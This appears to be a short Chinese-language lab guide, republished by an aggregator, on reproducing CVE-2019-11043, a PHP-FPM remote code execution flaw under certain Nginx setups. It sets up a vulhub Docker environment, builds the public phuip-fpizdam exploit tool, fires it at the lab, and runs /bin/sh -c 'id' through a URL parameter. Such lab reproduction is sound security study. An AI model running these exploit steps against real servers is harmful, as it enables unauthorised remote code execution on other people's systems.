[漏洞复现]CVE-2019-11043/PHP-FPM在Nginx特定配置下远程代码执行
环境准备
可以使用vulhub的环境
先在本地创建一个名为CVE-2019-11043
的文件夹,再创建一个名为www
的文件夹
在CVE-2019-11043
文件夹下执行如下命令
wget https://raw.githubusercontent.com/vulhub/vulhub/master/php/CVE-2019-11043/default.conf
wget https://raw.githubusercontent.com/vulhub/vulhub/master/php/CVE-2019-11043/docker-compose.yml
在CVE-2019-11043/www
文件夹下执行如下命令
wget https://raw.githubusercontent.com/vulhub/vulhub/master/php/CVE-2019-11043/www/index.php
下载完成三个文件以后,在CVE-2019-11043
文件夹下执行如下命令启动环境
service docker start
docker-compose up -d
随后访问http://ip:8080/index.php
即可
工具准备
访问https://github.com/neex/phuip-fpizdam
,clone到本地以后,执行如下命令(将根据OS自动生成对应的OS版本)
go build
即可生成phuip-fpizdam
工具
漏洞复现
使用./phuip-fpizdam http://ip:8080/index.php
攻击漏洞环境
随后访问http://ip:8080/index.php?a=/bin/sh+-c%20%27id%27&
即可
Reference
https://github.com/neex/phuip-fpizdam
https://github.com/vulhub/vulhub/tree/master/php/CVE-2019-11043
Author And Source
この問題について([漏洞复现]CVE-2019-11043/PHP-FPM在Nginx特定配置下远程代码执行), 我々は、より多くの情報をここで見つけました https://qiita.com/shimizukawasaki/items/39d68a7c658dfa50263d著者帰属:元の著者の情報は、元のURLに含まれています。著作権は原作者に属する。
Content is automatically searched and collected through network algorithms . If there is a violation . Please contact us . We will adjust (correct author information ,or delete content ) as soon as possible .